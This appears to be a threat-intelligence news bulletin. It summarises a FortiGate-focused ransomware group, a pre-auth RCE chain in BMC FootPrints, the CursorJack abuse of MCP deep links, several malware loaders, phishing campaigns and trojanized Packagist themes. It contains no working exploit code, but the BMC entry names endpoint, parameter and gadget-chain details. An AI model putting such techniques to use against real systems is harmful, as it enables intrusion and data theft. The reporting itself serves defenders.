ThreatsDay Bulletin: FortiGate RaaS, Citrix Exploits, MCP Abuse, LiveChat Phish & More

Group-IB has shed light on the various tactics adopted by The Gentlemen, a nascent Ransomware-as-a-Service (RaaS) operation that consists of about 20 members. It originated from a payment dispute after its operator “hastalamuerte” opened a public arbitration thread on the RAMP cybercrime forum, accusing Qilin ransomware operators of unpaid affiliate commission amounting to $48,000. The group primarily uses CVE-2024-55591, a critical authentication bypass vulnerability in FortiOS/FortiProxy, for initial access. “The group maintains an operational database of approximately 14,700 already exploited FortiGate devices globally,” the company said. “Separate from exploited devices, the operators maintain 969 validated brute-forced FortiGate VPN credentials ready for attack.” The Gentlemen also employs defense evasion via the bring your own vulnerable driver (BYOVD) technique to terminate security processes at the kernel level. About 94 organizations have already been attacked by this threat group since its emergence in July/August 2025.

Four security flaws (CVE-2025-71257, CVE-2025-71258, CVE-2025-71259, and CVE-2025-71260) have been disclosed in BMC FootPrints, a widely deployed ITSM solution, that could be chained into pre-authentication remote code execution. The attack sequence begins with an authentication bypass (CVE-2025-71257) that extracts a guest session token (“SEC_TOKEN”) from the password reset endpoint, which is then used to reach an unsanitized Java deserialization sink (CVE-2025-71260) in the “/aspnetconfig” endpoint’s “__VIEWSTATE” parameter. Exploitation via the AspectJWeaver gadget chain enables arbitrary file write to the Tomcat web root directory, achieving full remote code execution. Armed with the SEC_TOKEN, an attacker could also exploit two SSRF flaws (CVE-2025-71258 and CVE-2025-71259) and potentially leak internal data. The issues were addressed in September 2025.

The malware loader known as Hijack Loader is being used to deliver a previously undocumented, C++-based command-and-control (C2) framework known as SnappyClient. “SnappyClient has an extended list of capabilities, including taking screenshots, keylogging, a remote terminal, and data theft from browsers, extensions, and other applications,” Zscaler ThreatLabz said. “SnappyClient employs multiple evasion techniques to hinder endpoint security detection, including an Antimalware Scan Interface (AMSI) bypass, as well as implementing Heaven’s Gate, direct system calls, and transacted hollowing. SnappyClient receives two configuration files from the C2 server, which contain a list of actions to perform when a specified condition is met, along with another that specifies applications to target for data theft.” The framework was first discovered in December 2025. The attack chain involves the distribution of malicious payloads after a user visits a website impersonating the Spanish telecom firm Telefónica. It’s assessed that the primary use for SnappyClient is cryptocurrency theft, with a possible connection between the developers of HijackLoader and SnappyClient based on observed code similarities.

Proofpoint has detailed a new technique called CursorJack that abuses Cursor’s support for Model Context Protocol (MCP) deep links to enable local command execution or allow installation of a malicious remote MCP server. The attack takes advantage of the fact that MCP servers commonly specify a command in their “mcp.json” configuration. “The cursor:// protocol handler could be abused through social engineering in specific configurations,” the company said. “A single click followed by user acceptance of an install prompt could result in arbitrary command execution. The technique could be leveraged both for local code execution via the command parameter or to install a malicious remote MCP server via the URL parameter.” The enterprise security firm has also released a proof-of-concept (PoC) exploit on GitHub.

A new campaign is actively targeting known security flaws in Citrix NetScaler (CVE-2025-5777 and CVE-2023-4966). According to Defused Cyber, more than 500 exploit attempts have been recorded against its honeypot system on March 16, 2026. “Highly elevated exploit activity against older vulnerabilities can often precede a zero-day vulnerability,” it said.

Rapid7 said it’s seeing an increase in phishing campaigns where threat actors impersonate internal IT departments via Microsoft Teams. “The primary objective is to persuade users to launch Quick Assist, granting the TA remote access to deploy malware, exfiltrate data, or facilitate lateral movement across the network,” it added. “The recent surge in Teams-based delivery highlights a critical vulnerability in how organizations manage external access. Teams often allows any external user to message internal staff. This is the functional equivalent of operating an email server without a gateway filter.”

A new ClickFix-style campaign has compromised a Pakistani government website (“wasafaisalabad.gop[.]pk”) to deliver fake CAPTCHA lures. The attack chain installs an MSI installer via a disguised clipboard command, which drops an AutoHotKey-based backdoor polling a remote server for tasks, Gen Digital said. It’s currently not known how the website was breached. The social engineering tactic has proved so effective that even nation-state groups such as North Korea’s Lazarus group, Iran’s MuddyWater, and Russia’s APT28 have adopted it. In January, researchers from Sekoia reported that a separate ClickFix framework dubbed IClickFix had been injected into over 3,800 WordPress sites since 2024.

The malware loader known as Hijack Loader is being used to deliver an updated version of an information stealer referred to as ACRStealer. “This updated variant follows similar evasion techniques and C2 initialization strategy to make it even stealthier,” G DATA said. “This integration with HijackLoader highlights ACRStealer’s versatility and modularity, which will likely attract more malicious actors to use it as a final payload.” In these campaigns, Hijack Loader is downloaded from the domain associated with PiviGames, a Spanish portal hosting pirated PC games. The development comes against the backdrop of another campaign that involved several cases of malware being distributed through PiviGames.

A new phishing campaign has been observed using LiveChat, a customer service software featuring live messaging, to steal data. Phishing emails using refund-related themes are used to redirect users to a link hosted via LiveChat’s service (“direct.lc[.]chat”), from where they are asked to click on a link sent in the chat to complete the refund by entering their personal and financial information. “Unlike typical refund scams or credential phishing, this campaign engages victims through a real-time chat interface, impersonating well-known brands in order to harvest sensitive data such as account credentials, credit card details, multi-factor authentication (MFA) codes, and other personally identifiable information (PII),” Cofense said.

A SideWinder-adjacent cluster known as RagaSerpent is suspected to be leveraging tax audit and government compliance themes in spear-phishing emails to deliver multi-stage malware for command-and-control (C2) and establish sustained access across targeted organizations in Southeast Asia, including Indonesia and Thailand. The attack chain is consistent with a prior campaign targeting India using similar tax-related lures to deliver a legitimate enterprise tool called SyncFuture TSM, developed by a Chinese company. “This is not unusual in APT operations: in-country targeting can be used to complicate attribution (e.g., by creating noisy ‘domestic’ victimology) or to reach foreign diplomats/missions operating inside India—a pattern explicitly noted in reporting on SideWinder’s broader geographic targeting and diplomatic victim set,” ITSEC Asia said. The recent campaigns show the threat actor has expanded its operations beyond South Asia and into Africa, Europe, the Middle East, and Southeast Asia.

DJI has patched a security flaw in its backend that could have allowed attackers to take over all its Romo smart vacuums. Security researcher Sammy Azdoufal said DJI servers returned data for any device just by providing a device serial number. DJI shared the data on any device without any authentication or authorization. The researcher said he was able to map the locations of more than 7,000 Romo smart vacuums and 3,000 DJI portable power stations that shared the same server.

WhatsApp has begun testing support for setting an alphanumeric account password. It can be anywhere between six and 20 characters long and should include at least one letter and one number. Adding an alphanumeric password to the equation is likely an effort to make brute-force attempts harder. For example, if a threat actor carries out a SIM swap to intercept messages and bypass two-factor authentication, they would still need to enter the 6-20 character-long password to gain access to the victim’s WhatsApp account. 

More evidence has emerged that the 0APT ransom group is likely a fake and a fraud. “Thus far, the threat actor has not provided credible proof of ransomware or data exfiltration attacks as the data samples on the DLS appeared to be fabricated,” Intel 471 said. “For example, the files that supposedly contained metadata of data stolen from victim networks were unusually large, reaching several terabytes each. Additionally, partial downloads of those files indicated they did not contain any useful data, and in fact, we observed several instances in which the content contained a repeating pattern of null bytes.”

Google rejected 1.75 million policy-violating Android apps and blocked more than 80,000 developer accounts from the Google Play Store in 2025, down from 2.36 million apps and 158,000 accounts in 2024. The company said that through 2025, it blocked more than 255,000 Android apps from obtaining excessive access to sensitive user data, and that it implemented more than 10,000 safety checks on published apps and strengthened detection capabilities by integrating Google’s latest generative artificial intelligence (AI) models into the review process. Android’s built-in security suite, Play Protect, which now scans over 350 billion apps every day, has identified over 27 million malicious apps sideloaded from outside Google Play. Play Protect’s ‘enhanced fraud protection’ has been expanded to cover over 2.8 billion Android devices in 185 markets, blocking 266 million installation attempts from 872,000 unique risky apps. In a related development, the tech giant has made available Scam Detection for phone calls on Google Pixel devices in the U.S., U.K., Australia, Canada, France, Germany, India, Ireland, Italy, Japan, Mexico, and Spain. It’s also being expanded to Samsung Galaxy S26 series in the U.S.

A report from VulnCheck found that a mere 1% of 2025 CVEs were exploited in the wild by the end of the year. Network edge devices accounted for a third of all products exploited last year. “There was a small decrease (-13%) in new vulnerabilities linked to named state-sponsored threat groups and APTs over the course of 2025,” the cybersecurity company said. “New CVE exploits attributed to China-nexus groups increased while Iranian exploit activity fell.” Another report from IBM X-Force revealed that there has been a 44% increase in cyberattacks exploiting public-facing applications.

The European Parliament has voted to extend a temporary exemption to E.U. privacy legislation that allows online platforms to voluntarily detect child sexual abuse material (CSAM) until August 2027. Lawmakers said the additional time will allow the bloc to negotiate and adopt a long-term legal framework to prevent and combat CSAM online.

A previously undocumented attack chain delivered via a phishing URL has been found to distribute a ZIP archive containing a C++ trojan downloader, which then initiates a loader responsible for decrypting and staging the Rhadamanthys stealer and XMRig cryptocurrency miner. “The campaign’s core evasion relies on .NET Native Ahead-of-Time (AOT) compiled binaries, which strip traditional .NET metadata, frustrate common .NET analysis tools, and force analysts to fall back on native-level tooling, making detection and reverse engineering significantly harder,” Cyderes said. “Sophisticated anti-analysis capabilities: The AOT loader employs a sandbox scoring system evaluating RAM size, system uptime, user file counts, and AV process presence; virtual machine detection via registry inspection; and active suppression of miner activity when monitoring tools like Task Manager, Process Hacker, or x64dbg are detected.”

GitGuardian’s State of Secrets Sprawl report has found that 28,649,024 new secrets were added to public GitHub commits in 2025 alone, up 34% from the previous year. The figure also represents a 152% increase in leaked secrets growth since 2021. In 2025, AI service secrets reached 1,275,105, up 81% year-over-year. Also identified by GitGuardian were 24,008 unique secrets exposed in MCP-related configuration files across public GitHub, including 2,117 unique valid credentials.

Six malicious Packagist packages posing as OphimCMS themes have been found to contain trojanized jQuery that exfiltrates URLs, injects full-screen overlay ads, and loads Funnull-linked redirects. The packages are ophimcms/theme-dy, ophimcms/theme-mtyy, ophimcms/theme-rrdyw, ophimcms/theme-pcc, ophimcms/theme-motchill, and ophimcms/theme-legend. “All six ship trojanized JavaScript assets, primarily disguised as legitimate jQuery libraries, that redirect visitors, exfiltrate URLs, inject ads, and in the most severe case load a second-stage payload – a mobile-targeted redirect to gambling and adult content sites, from infrastructure operated by Funnull,” Socket said.

A C-level executive at Swedish security firm Outpost24 was targeted in a sophisticated phishing attack. The multi-chain redirect phishing campaign impersonated JPMorgan Chase to trick the recipient into reviewing a document by clicking on a link and triggering the infection. The link is a redirect URL hosted within Cisco’s infrastructure, which then initiates a series of URL redirects that leverage trusted services like Nylas as well as compromised legitimate infrastructure to bypass security filters and conceal the final phishing destination. “Several stages redirect victims through legitimate or previously reputable domains, reducing the likelihood that security scanners or reputation-based filtering will block the link,” Specops said. “The attackers went as far as to implement a legitimate Cloudflare-based ‘human validation’ step to ensure that only real people saw the actual landing page where credentials are requested.” The attack, ultimately unsuccessful, is said to have used a new phishing-as-a-service (PhaaS) toolkit named Kratos.